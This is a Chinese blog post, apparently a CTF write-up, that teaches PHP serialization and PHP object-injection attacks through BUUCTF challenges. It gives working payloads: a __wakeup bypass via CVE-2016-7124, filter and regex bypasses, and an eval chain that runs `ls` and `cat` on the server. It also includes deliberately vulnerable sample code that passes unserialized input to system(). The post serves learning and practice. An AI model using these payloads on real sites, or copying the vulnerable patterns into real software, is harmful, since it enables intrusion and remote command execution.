ctf中的php序列化与反序列化

最新推荐文章于 2024-07-19 14:54:41 发布
最新推荐文章于 2024-07-19 14:54:41 发布
阅读量1.5k 收藏 19
点赞数 2
分类专栏: buuctf 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/109561639
版权

ctf中的php序列化与反序列化

刚开始学的php序列化与反序列化,有点雨里雾里的,于是做个笔记~~

首先我们来了解一下概念知道他是怎么样的一个东西:

序列化(串行化):是将变量转换为可保存或传输的字符串的过程;
反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。
这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。

然后了解魔术方法:

__construct: 在创建对象时候初始化对象,一般用于对变量赋初值。
__destruct: 和构造函数相反,当对象所在函数调用完毕后执行。
__toString:当对象被当做一个字符串使用时调用。
__sleep:序列化对象之前就调用此方法(其返回需要一个数组)
__wakeup:反序列化恢复对象之前调用该方法
__call:当调用对象中不存在的方法会自动调用该方法。
__get:在调用私有属性的时候会自动执行
__isset()在不可访问的属性上调用isset()或empty()触发
__unset()在不可访问的属性上使用unset()时触发

常见的方法有前面五个,所以尽量关注前面五个,下面我们看看每个方法的用法以及效果。

测试的源码:

<?php

class SER
{
    public $name;
    private $age;
    protected $sec;
   public function __construct()
   {
       echo "这是__construct()!在创建对象时使用,例如:\$aa = new SER();";
       echo "\n";

   }

   public function __destruct()
   {
       echo "这是__destruct()!在调用完后销毁对象时使用";
       echo "\n";
   }

   public function __toString()
   {
      echo "这是__toString()!当对象被当做一个字符串使用时调用   ";
      return  "and must have return "."\n";

   }

   public function __sleep()
   {
       echo "这是__sleep()!在序列化一个对象时使用,例如:serialize()";
       echo "\n";
   }

   public function __wakeup()
   {
       echo "这是__wakeup()!在反序列化一个对象时使用,例如:unserialize()";
       echo "\n";
   }

}


$mirror = new SER(); //__construct()
//echo $mirror;   //__toString()
//serialize($mirror);  //__sleep()
//unserialize($mirror);  //__wakeup()
                        //__destruct()

__construct()的示例:

在这里插入图片描述

__construct()、__toString()的示例:

需要注意的是__toString()必须要有一个返回值。
在这里插入图片描述

__construct()、__toString()、__sleep()的示例:
在这里插入图片描述
__construct()、__toString()、__sleep()、__wakeup()的示例:

因为序列化和反序列化分别调用了一次,所以__destruct()也出现了两次

在这里插入图片描述

接下来我们看序列化的格式:

O:3:"SER":3:{s:4:"name";s:6:"mirror";s:8:" SER age";s:2:"18";s:6:" * sec";s:2:"男";}
对象类型:长度:"名字":类中变量的个数:{类型:长度:"名字";类型:长度:"值";......}

然后看序列化的三种类型:
在这里插入图片描述

序列化后的结果为:O:3:“SER”:3:{s:4:“name”;s:6:“mirror”;s:8:" SER age";s:2:“18”;s:6:" * sec";s:2:“男”;},仔细观察我们就会发现每一个类型输出的都不一样。

 public   //{s:4:"name";s:6:"mirror"->序列出来的变量直接是变量名name
 private  //s:8:" SER age";s:2:"18"->序列出来的变量是:%00+类名+%00+变量名(两个%00加上字符所以长度为8)或者\00
 protected  //s:6:" * sec";s:2:"男"->序列出来的变量是:%00+*+%00+变量名  (两个%00加上字符所以长度为6)或者\00

因为%00是不可打印字符,显示不了,但是查看网页源码可以看到乱码,但是他是存在的。
在这里插入图片描述

接下来我们写一个简单反序列化可控参数的代码,清楚直观的感受序列化与反序列化

<?php
class A{
    public $cmd;
    public function __wakeup()
    {
        system($this->cmd);
    }
}
$a = $_GET['cmd'];
$a_unser = unserialize($a);
?>

前面我们说过__wakeup()在被反序列时使用,现在代码中的cmd我们可控,我们就可以做一个恶意的序列化代码,让他在进行反序列化的时候能够执行我们想要的命令。

O:1:"A":1:{s:3:"cmd";s:3:"dir";}

在这里插入图片描述

拿payload去测试,可以看到命令被执行了,只不过由于环境编码的问题,这里乱码了

?cmd=O:1:"A":1:{s:3:"cmd";s:3:"dir";}

在这里插入图片描述

接下来进入正题,ctf中绕过__wakeup(),这里取自BUUCTF的: [极客大挑战 2019]PHP

扫网站的备份文件得备份文件名是www.zip

里面有用的php文件:class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

在构造序列化函数的时候会把属性赋值, 不过这个我们能控制,不用纠结

$username = 'nonono';
$password = 'yesyes';

真正重要的是反序列时调用的两个方法,__wakeup()、__destruct(),在进行反序列化操作的时候,__wakeup()方法总会把你的username变成guest,这样子的话就过不了__destruct()的要求:需要password=100,username=admin。

但是__wakeup()本身有一个漏洞:
CVE-2016-7124
PHP5 < 5.6.25
PHP7 < 7.0.10

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,所以接下来制造payload

O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";s:3:"100";}

在这里插入图片描述
我们使属性个数大于真实个数,并且要注意他的类型是私有类型,要加上%00,所以最后的payload为:

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

拿到flag
这题用%00成功用\00失败
在这里插入图片描述

下一个是绕过字符串过滤

例题取自[网鼎杯 2020 青龙组]AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

GET方式传入序列化的str字符串,str字符串中每一个字符的ASCII范围在32到125之间,然后对其反序列化。

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

这里的op是强类型比较,如果类型为string值为2的话,op就会被赋值为1,否则,content为空并进入下一个函数

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

这里的op是弱类型比较,只要值为2就可以进入下一个函数,因为op为1是写函数对我们没用,所以不做分析,到现在我们要先绕过强类型限制来到该函数
绕过方法:op=2,这里的2是整数int类型,op=2时,op===“2” 为false,op=="2"为true,就可以来到该函数
string和int的区别和比较
在这里插入图片描述

public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

这里是一个读文件的函数,我们要包含flag.php就好

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

我们可以通过控制read()读取flag.php的内容。

但是现在需要绕过is_valid() 函数
is_valid()函数规定字符的ASCII码必须是32-125,而protected属性在序列化后会出现不可见字符\00*\00,转化为ASCII码不符合要求。

绕过方法:

①PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过

<?php
class FileHandler {

    public $op = 2;
    public $filename = "flag.php";
    public $content="s";  //任意
}
$mirror = new FileHandler();
echo serialize($mirror);
?>

poyload:

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"s";}

在这里插入图片描述

②protected属性会引入\00*\00,但是序列化字符串中表示字符类型的s大写时,该值会被当成16进制解析。

<?php
class FileHandler {

    protected $op = 2;
    protected $filename = "flag.php";
    protected $content="s";  //任意
}
$mirror = new FileHandler();
echo serialize($mirror);
?>

payload:

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";S:8:"flag.php";S:10:"\00*\00content";S:1:"s";}

在这里插入图片描述
这题用\00成功用%00失败

下一个是绕过正则

取自19年百度杯十月赛的hash

1. h a s h = m d 5 ( hash=md5( hash=md5(sign.$key);the length of $sign is 8

2.key=123&hash=f9109d5f83921a551cf859f853afe7bb

然后md5解密那个hash=kkkkkk01123

根据源码说的$sign位数为8位,后改一下key 然后md5后得到提示Gu3ss_m3_h2h2.php这个文件

poyload:

?key=12&hash=3fa25df8b0dbc0be0840be63792b1610

得到一个页面:Gu3ss_m3_h2h2.php,进去看见源码

<?php
class Demo {
    private $file = 'Gu3ss_m3_h2h2.php';

    public function __construct($file) {
        $this->file = $file;
    }

    function __destruct() {
        echo @highlight_file($this->file, true);
    }

    function __wakeup() {
        if ($this->file != 'Gu3ss_m3_h2h2.php') {
            //the secret is in the f15g_1s_here.php
            $this->file = 'Gu3ss_m3_h2h2.php';
        }
    }
}

if (isset($_GET['var'])) {
    $var = base64_decode($_GET['var']);
    if (preg_match('/[oc]:\d+:/i', $var)) {
        die('stop hacking!');
    } else {

        @unserialize($var);
    }
} else {
    highlight_file("Gu3ss_m3_h2h2.php");
}
?>

在这里要绕过两点:
1、 __wakeup() 函数,用我们前面提到的那个方法就好
2、绕过正则,不能出现像O:4这样子的字符串,说白了就是针对需序列化的字符串的,可以在数字前面加+号,如O:+4

所以payload:

在这里插入图片描述

这里把得到序列化字符串加上%00在ps上base64加密后也不能正确加密,所以先把字符串放到burp上显示十六进制将20都换为00再base64加密得到的payload才能用,记得在4前面加上+
在这里插入图片描述
进入下一层

<?php
if (isset($_GET['val'])) {
    $val = $_GET['val'];
    eval('$value="' . addslashes($val) . '";');
} else {
    die('hahaha!');
}
?>

addslashes()函数主要用来过滤单、双引号,用不了system
在这里插入图片描述

我们这样构造:

/f15g_1s_here.php?val=${eval($_GET[a])}&a=echo `ls`;

在这里插入图片描述

利用的原理就是像这样实现命令执行:

${phpinfo()}

在这里插入图片描述

这样成功执行了ls命令,发现了flag所在的文件,然后cat就可以获得flag:

/f15g_1s_here.php?val=${eval($_GET[a])}&a=echo `cat True_F1ag_i3_Here_233.php`;

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

XingHe_0
关注
专栏目录
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 3912
代码开门见山给出backdoor函数,而该函数在popko类的call方法调用故需要运行call方法而call方法是在对象上下文调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类构造一个对象,当pipimi的destru
ctf+php反序列化,CTFPHP反序列化漏洞简单分析
weixin_39965881的博客
04-02 1777
本帖最后由 icq_8bf67fe65 于 2018-9-2 21:20 编辑本文原创作者:Versi0n,本文属i春秋原创奖励计划,未经许可禁止转载!一、前言在ctf比赛,经常会遇到php反序列化漏洞的题,今天就来简单分析下该漏洞的正确食用姿势~二、正文1.基础知识PHP序列化php为了方便进行数据的传输,允许把复杂的数据结构,压缩到一个字符串,使用serialize()函数。PHP反序列...
ctfphp序列化,CTF——Web——PHP序列化反序列化
weixin_35126200的博客
04-01 917
PHP 序列化反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化时 私有属性 会加 空白...
CTF——Web——PHP序列化反序列化
小锤队长的博客
08-09 5780
PHP 序列化反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
ctfphp反序列化汇总
最新发布
2302_78903258的博客
07-19 1428
解题过程:首先需要找到最后的危险函数,看到了在Vox里面的include。然后想要使用include就要调用fun这个函数想要调用fun就要触发__invoke这个魔术方法__invoke() //当脚本尝试将对象调用为函数时触发作为函数就是添加了一个小括号去触发,发现在Petal类__get方法具备这个调用函数的功能,所以需要去触发__get这个方法。
ctf 序列化反序列化
eliforsharon的博客
01-25 2107
目录序列化后覆盖后方参数 序列化后覆盖后方参数 链接: 参见题目[0CTF 2016]piapiapia1. 本题可以通过上传数据并将其序列化存储,然后再进行反序列化进行显示。题目关键即在于要从file_get_contents函数读取config.php,而题目直接上传的数据会进行md5处理,所以这里需要采用将数组$nickname的值用 s:5:"photo";s:10:"config.php";} 进行封闭来覆盖后方参数,而考虑到值长度的变化也会影响序列化后表达。需要从题目寻找将字符串由少变
ctf序列化
小飒的博客
08-19 1110
一、基础 序列化反序列化 php的两个函数 序列化函数:serialize() 反序列化函数:unserialize() 当在php创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 具体使用如下: <?php class xu{ var $a='1'; } $class1=new xu; echo serialize($class1); ?> 运行结果:O:2:“xu”:1:{s:1:“a”;s:1:“1”;} 反序列化 &
ctf序列化
weixin_51313108的博客
08-23 391
bugku序列化的题相关知识的积累题目&WP 相关知识的积累 file_get_contents(path):将path文件内容读取成一个字符串file_get_contents语句详解。 input://写入PHP文件 有关PHP序列化的知识一文让PHP反序列化从入门到进阶。PHP之十六个魔术方法详解。序列化的意义:序列化就是把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式。 PHP的类和对象 题目&WP 首先是给了俩个PHP文件:index.php和hint.php
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛,编程者经常面临各种挑战,其反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
CTF2--php序列化反序列化
Hydra的博客
10-12 398
前言        php反序列化遇到好多次,总是被虐,在百度的基础上总结一波, 如果有啥不会的,或者我哪里说错了,可以加1617376586 互相学习探讨一下。 php反序列化 怎么判断是不是php反序列化那,基本上我是根据serialize(),unserialize()这两个函数来判断的。 那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。 而反序列化就是把那...
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
BUUCTFphp反序列化
yzl_007的博客
10-23 977
BUUCTFphp反序列化 [极客大挑战 2019]PHP __wakeup()绕过 有备份,盲猜www.zip,下载了网站源码,class.php 引用了flag.php //class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function _
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
weixin_44632787的博客
06-25 746
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化 题目 Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and
序列化反序列化
qq_53106085的博客
10-31 253
序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 比如:现在我们都会在淘宝上买桌子,桌子这种很不规则的东西,该怎么从一个城市运输到另一个城市,这时候一般都会把它拆掉成板子,再装到箱子里面,就可以快递寄出去了,这个过程就类似我们的序列化的过程(把数据转化为可以存储或者传输的形式)。当买家收到货后,就需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。 php 将数据序列化反序列化会用到两个函数: 1.serialize将对象格式化.
网鼎杯2020php反序列化,[BUUCTF-WEB] [网鼎杯 2020 青龙组]AreUSerialz
weixin_39846289的博客
04-15 210
SubjectPHP 代码审计 DeserializeMind Palace粗略扫一眼代码,基本确定是反序列化漏洞:function is_valid($s){for($i = 0; $i < strlen($s); $i++)// string: s[i] is between ' ' to '}'if(!(ord($s[$i]) >= 32 && ord($s[$i...
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计
weixin_44632787的博客
07-28 1738
BUUCTF之[安洵杯 2019]easy_serialize_php -------- 反序列化/序列化和代码审计 知识点 反序列化的对象逃逸 extract()变量覆盖 虽然这题说很easy,但是一点都不easy。我花了好长的时间才能看懂。但是里面的知识点却很有意思,希望我能记下来… 废话不多说,放代码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','
BUUCTF--ReadlezPHP反序列化简单应用)()
cainiao17441898的博客
08-15 257
目录扫描之后发现没有文件泄露。 查看一下源码发现了两个链接。 源码: PHP魔术方法:magic 这里eval没有用了不知道为啥(可能被过滤了吧)。 这里用了assert截断函数(作用跟eval差不多,eval里面的语句要以;结尾) 这里用蚁剑连接会连不上,就先查看一下phpinfo的信息。 生成payload: <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function
buuctf-ReadlezPHP(反序列化)
m0_62094846的博客
05-22 389
点开后是源代码,要把前面的view-source:删了 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } public function __destruct(){ ...
ctf php反序列化
06-07
CTFPHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击,攻击者通常会在Cookie、GET或POST参数注入恶意的序列化数据,然后通过触发漏洞来执行恶意代码或获取敏感信息。为了防止这种攻击,应用程序开发人员需要对输入进行严格的过滤和验证,并且尽可能避免使用反序列化功能。此外,还可以使用专门的安全框架来防止这种攻击,比如PHP的Suhosin扩展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值